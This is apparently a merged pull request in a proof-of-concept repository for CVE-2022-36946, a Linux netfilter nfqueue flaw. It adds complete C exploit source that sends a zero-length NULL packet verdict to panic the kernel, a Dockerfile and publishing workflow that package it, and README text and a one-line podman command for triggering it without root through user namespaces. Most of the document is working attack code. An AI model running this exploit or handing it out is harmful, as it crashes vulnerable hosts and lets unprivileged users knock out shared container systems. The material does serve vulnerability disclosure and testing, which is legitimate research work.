Merge pull request #2 from Pwnzer0tt1/unprivileged

Unprivileged POC

.github/workflows/docker-image.yml

@@ -0,0 +1,53 @@
+name: Create and publish a Docker image
+
+on:
+  release:
+    types:
+      - published
+
+env:
+  REGISTRY: ghcr.io
+  IMAGE_NAME: ${{ github.repository }}
+
+jobs:
+  build-and-push-image:
+    runs-on: ubuntu-latest
+    permissions:
+      contents: read
+      packages: write
+
+    steps:
+      - name: Checkout repository
+        uses: actions/checkout@v3
+
+      - name: Set up QEMU
+        uses: docker/setup-qemu-action@master
+        with:
+          platforms: all
+
+      - name: Set up Docker Buildx
+        id: buildx
+        uses: docker/setup-buildx-action@master
+
+      - name: Log in to the Container registry
+        uses: docker/login-action@v2
+        with:
+          registry: ${{ env.REGISTRY }}
+          username: ${{ github.actor }}
+          password: ${{ secrets.GITHUB_TOKEN }}
+
+      - name: Extract metadata (tags, labels) for Docker
+        id: meta
+        uses: docker/metadata-action@v4
+        with:
+          images: ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}
+
+      - name: Build and push Docker image
+        uses: docker/build-push-action@v3
+        with:
+          context: .
+          builder: ${{ steps.buildx.outputs.name }}
+          platforms: linux/amd64,linux/arm64
+          push: true
+          tags: ${{ steps.meta.outputs.tags }}
+          labels: ${{ steps.meta.outputs.labels }}

Dockerfile

@@ -0,0 +1,9 @@
+FROM debian
+
+RUN apt-get update
+RUN apt-get install -y libnetfilter-queue-dev libmnl-dev libnfnetlink-dev iptables gcc
+WORKDIR /exploit
+COPY panic6_podman.c panic6.c
+
+RUN cc panic6.c -o nfpanic -lmnl -lnetfilter_queue
+CMD ["./nfpanic"]

README.md

@@ -22,6 +22,22 @@ So, if user truncates the packet below the header size, this skb\_pull() will re
 
 Try it executing [this](/panic6.c) c source code.
 
+# Do we *really* need root...?
+
+Using linux namespaces, in particular user namespaces (enabled via `kernel.unprivileged_userns_clone=1`), a normal user is able 
+to create a network namespace, enabling them to use the same kernel primitives that trigger the panic.
+This will allow you to use the vulnerability without having root.
+
+This scenario is not uncommon: for example [podman](https://podman.io/) uses this option to run its (rootless) containers,
+and on some distros this option is enabled by default.
+
+You can also try to execute the exploit without root privileges executing:
+
+```bash
+podman run -it --cap-add NET_ADMIN ghcr.io/pwnzer0tt1/cve-2022-36946
+```
+
+
 # Fix up
 
 Fixed in linux kernel 5.19 [view diff](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/diff/net/netfilter/nfnetlink_queue.c?id=v5.19&id2=v5.18)

amd64/xtables/libxt_DNAT.so

@@ -0,0 +1 @@
+libxt_NAT.so

amd64/xtables/libxt_MASQUERADE.so

@@ -0,0 +1 @@
+libxt_NAT.so

amd64/xtables/libxt_NOTRACK.so

@@ -0,0 +1 @@
+libxt_CT.so

amd64/xtables/libxt_REDIRECT.so

@@ -0,0 +1 @@
+libxt_NAT.so

amd64/xtables/libxt_SNAT.so

@@ -0,0 +1 @@
+libxt_NAT.so

amd64/xtables/libxt_state.so

@@ -0,0 +1 @@
+libxt_conntrack.so

arm64/xtables/libxt_DNAT.so

@@ -0,0 +1 @@
+libxt_NAT.so

arm64/xtables/libxt_MASQUERADE.so

@@ -0,0 +1 @@
+libxt_NAT.so

arm64/xtables/libxt_NOTRACK.so

@@ -0,0 +1 @@
+libxt_CT.so

arm64/xtables/libxt_REDIRECT.so

@@ -0,0 +1 @@
+libxt_NAT.so

arm64/xtables/libxt_SNAT.so

@@ -0,0 +1 @@
+libxt_NAT.so

arm64/xtables/libxt_state.so

@@ -0,0 +1 @@
+libxt_conntrack.so

panic6.c

@@ -10,55 +10,60 @@
 #include <sys/socket.h>
 #include <string.h>
 
-//How to compile:
-//cc panic6.c -o nfpanic -lmnl -lnetfilter_queue && sudo setcap "CAP_NET_ADMIN+ep" ./nfpanic && ./nfpanic
+// How to compile:
+// cc panic6.c -o nfpanic -lmnl -lnetfilter_queue && sudo setcap "CAP_NET_ADMIN+ep" ./nfpanic && ./nfpanic
 
 int socket_conn(uint16_t port)
 {
-    int sockfd, connfd;
-    struct sockaddr_in servaddr, cli;
-
-    // socket create and verification
-    sockfd = socket(AF_INET, SOCK_STREAM | SOCK_NONBLOCK, 0);
-    if (sockfd == -1) {
-        perror("socket creation failed");
-        exit(EXIT_FAILURE);
-    }
-    bzero(&servaddr, sizeof(servaddr));
-
-    // assign IP, PORT
-    servaddr.sin_family = AF_INET;
-    servaddr.sin_addr.s_addr = inet_addr("127.0.0.1");
-    servaddr.sin_port = htons(port);
-
-    // connect the client socket to server socket
-    connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr));
+	int sockfd, connfd;
+	struct sockaddr_in servaddr, cli;
+
+	// socket create and verification
+	sockfd = socket(AF_INET, SOCK_STREAM | SOCK_NONBLOCK, 0);
+	if (sockfd == -1)
+	{
+		perror("socket creation failed");
+		exit(EXIT_FAILURE);
+	}
+	bzero(&servaddr, sizeof(servaddr));
+
+	// assign IP, PORT
+	servaddr.sin_family = AF_INET;
+	servaddr.sin_addr.s_addr = inet_addr("127.0.0.1");
+	servaddr.sin_port = htons(port);
+
+	// connect the client socket to server socket
+	connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr));
+	return sockfd;
 }
 
 int main(int argc, char *argv[])
 {
-	size_t BUF_SIZE = 0xffff+(MNL_SOCKET_BUFFER_SIZE/2);
+	size_t BUF_SIZE = 0xffff + (MNL_SOCKET_BUFFER_SIZE / 2);
 	char buf[BUF_SIZE];
 	uint16_t queue_num = 1337;
 	struct nlmsghdr *nlh;
 
 	puts("[*] Creating the socket with the kernel");
-	struct mnl_socket* nl = mnl_socket_open(NETLINK_NETFILTER);
-	if (nl == NULL) {
-		perror( "mnl_socket_open" );
+	struct mnl_socket *nl = mnl_socket_open(NETLINK_NETFILTER);
+	if (nl == NULL)
+	{
+		perror("mnl_socket_open");
 		exit(EXIT_FAILURE);
 	}
 	puts("[*] Binding the socket");
-	if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) {
-		perror( "mnl_socket_bind" );
+	if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0)
+	{
+		perror("mnl_socket_bind");
 		exit(EXIT_FAILURE);
 	}
 
-	printf("[*] Sending the BIND command for the nfqueue %d\n",queue_num);
+	printf("[*] Sending the BIND command for the nfqueue %d\n", queue_num);
 	nlh = nfq_nlmsg_put(buf, NFQNL_MSG_CONFIG, queue_num);
 	nfq_nlmsg_cfg_put_cmd(nlh, AF_INET, NFQNL_CFG_CMD_BIND);
-	if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) {
-		perror( "mnl_socket_send" );
+	if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0)
+	{
+		perror("mnl_socket_send");
 		exit(EXIT_FAILURE);
 	}
 
@@ -67,38 +72,38 @@ int main(int argc, char *argv[])
 	nfq_nlmsg_cfg_put_params(nlh, NFQNL_COPY_META, 0xffff);
 	mnl_attr_put_u32(nlh, NFQA_CFG_FLAGS, htonl(NFQA_CFG_F_GSO));
 	mnl_attr_put_u32(nlh, NFQA_CFG_MASK, htonl(NFQA_CFG_F_GSO));
-	if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) {
-		perror( "mnl_socket_send" );
+	if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0)
+	{
+		perror("mnl_socket_send");
 		exit(EXIT_FAILURE);
 	}
-	
+
 	printf("[*] You need to associate to this queue the port 1337: sudo iptables -t mangle -A PREROUTING -j NFQUEUE -p tcp --dport 1337 --queue-num %d\n", queue_num);
 	puts("Press ENTER to contiune (and panic)");
 	getchar();
 
 	puts("[*] Sending a connection packet to nfqueue");
 	socket_conn(1337);
 
-
 	puts("[*] Waiting for a packet in the nfqueue");
-	if (mnl_socket_recvfrom(nl, buf, BUF_SIZE) == -1) {
-		perror( "mnl_socket_recvfrom" );
+	if (mnl_socket_recvfrom(nl, buf, BUF_SIZE) == -1)
+	{
+		perror("mnl_socket_recvfrom");
 		exit(EXIT_FAILURE);
 	}
 
-	puts("[*] Sending the verdict with a NULL pointer and len = 0");
+	puts("[*] Setting the verdict with a NULL pointer and len = 0");
 	nlh = nfq_nlmsg_put(buf, NFQNL_MSG_VERDICT, queue_num);
 	nfq_nlmsg_verdict_put_pkt(nlh, NULL, 0);
-	nfq_nlmsg_verdict_put(nlh, 1, NF_ACCEPT );
+	nfq_nlmsg_verdict_put(nlh, 1, NF_ACCEPT);
 
 	puts("[*] Sending the verdict to the kernel, Good panic :D");
-	sleep(1); //Only to see the print
-	if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) {
-		perror( "mnl_socket_send" );
+	sleep(1); // Only to see the print
+	if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0)
+	{
+		perror("mnl_socket_send");
 		exit(EXIT_FAILURE);
 	}
-	puts("[*] Are you still alive?");
-
+	puts("[*] Are you still alive? Probably your kernel is not vulnerable :(");
+	return EXIT_SUCCESS;
 }
-
-

panic6_podman.c

@@ -0,0 +1,115 @@
+#include <arpa/inet.h>
+#include <linux/netfilter/nfnetlink_queue.h>
+#include <libnetfilter_queue/libnetfilter_queue.h>
+#include <linux/netfilter/nfnetlink_conntrack.h>
+#include <libmnl/libmnl.h>
+#include <linux/netfilter.h>
+#include <linux/netfilter/nfnetlink.h>
+#include <linux/types.h>
+#include <stdlib.h>
+#include <sys/socket.h>
+#include <string.h>
+
+// How to compile:
+// cc panic6.c -o nfpanic -lmnl -lnetfilter_queue && sudo setcap "CAP_NET_ADMIN+ep" ./nfpanic && ./nfpanic
+
+int socket_conn(uint16_t port)
+{
+	int sockfd, connfd;
+	struct sockaddr_in servaddr, cli;
+
+	// socket create and verification
+	sockfd = socket(AF_INET, SOCK_STREAM | SOCK_NONBLOCK, 0);
+	if (sockfd == -1)
+	{
+		perror("socket creation failed");
+		exit(EXIT_FAILURE);
+	}
+	bzero(&servaddr, sizeof(servaddr));
+
+	// assign IP, PORT
+	servaddr.sin_family = AF_INET;
+	servaddr.sin_addr.s_addr = inet_addr("127.0.0.1");
+	servaddr.sin_port = htons(port);
+
+	// connect the client socket to server socket
+	connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr));
+	return sockfd;
+}
+
+int main(int argc, char *argv[])
+{
+	size_t BUF_SIZE = 0xffff + (MNL_SOCKET_BUFFER_SIZE / 2);
+	char buf[BUF_SIZE];
+	uint16_t queue_num = 1337;
+	struct nlmsghdr *nlh;
+
+	puts("[*] Creating the socket with the kernel");
+	struct mnl_socket *nl = mnl_socket_open(NETLINK_NETFILTER);
+	if (nl == NULL)
+	{
+		perror("mnl_socket_open");
+		exit(EXIT_FAILURE);
+	}
+	puts("[*] Binding the socket");
+	if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0)
+	{
+		perror("mnl_socket_bind");
+		exit(EXIT_FAILURE);
+	}
+
+	printf("[*] Sending the BIND command for the nfqueue %d\n", queue_num);
+	nlh = nfq_nlmsg_put(buf, NFQNL_MSG_CONFIG, queue_num);
+	nfq_nlmsg_cfg_put_cmd(nlh, AF_INET, NFQNL_CFG_CMD_BIND);
+	if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0)
+	{
+		perror("mnl_socket_send");
+		exit(EXIT_FAILURE);
+	}
+
+	puts("[*] Setting config to COPY_META mode");
+	nlh = nfq_nlmsg_put(buf, NFQNL_MSG_CONFIG, queue_num);
+	nfq_nlmsg_cfg_put_params(nlh, NFQNL_COPY_META, 0xffff);
+	mnl_attr_put_u32(nlh, NFQA_CFG_FLAGS, htonl(NFQA_CFG_F_GSO));
+	mnl_attr_put_u32(nlh, NFQA_CFG_MASK, htonl(NFQA_CFG_F_GSO));
+	if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0)
+	{
+		perror("mnl_socket_send");
+		exit(EXIT_FAILURE);
+	}
+
+	puts("[*] Linking the nfqueue to a real connection through iptables");
+	char cmd[200];
+	sprintf(cmd, "iptables -t mangle -A PREROUTING -j NFQUEUE -p tcp --dport 1337 --queue-num %d\n", queue_num);
+	if (system(cmd) != 0)
+	{
+		perror("system");
+		exit(EXIT_FAILURE);
+	}
+
+	puts("[*] Sending a connection packet to nfqueue");
+	socket_conn(1337);
+
+	puts("[*] Waiting for a packet in the nfqueue");
+	if (mnl_socket_recvfrom(nl, buf, BUF_SIZE) == -1)
+	{
+		perror("mnl_socket_recvfrom");
+		exit(EXIT_FAILURE);
+	}
+
+	puts("[*] Sending the verdict with a NULL pointer and len = 0");
+	nlh = nfq_nlmsg_put(buf, NFQNL_MSG_VERDICT, queue_num);
+	nfq_nlmsg_verdict_put_pkt(nlh, NULL, 0);
+	nfq_nlmsg_verdict_put(nlh, 1, NF_ACCEPT);
+
+	puts("[*] Sending the verdict to the kernel, Good panic :D");
+	sleep(1); // Only to see the print
+	if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0)
+	{
+		perror("mnl_socket_send");
+		exit(EXIT_FAILURE);
+	}
+
+	puts("[*] Are you still alive? Probably your kernel is not vulnerable :(");
+	return EXIT_SUCCESS;
+}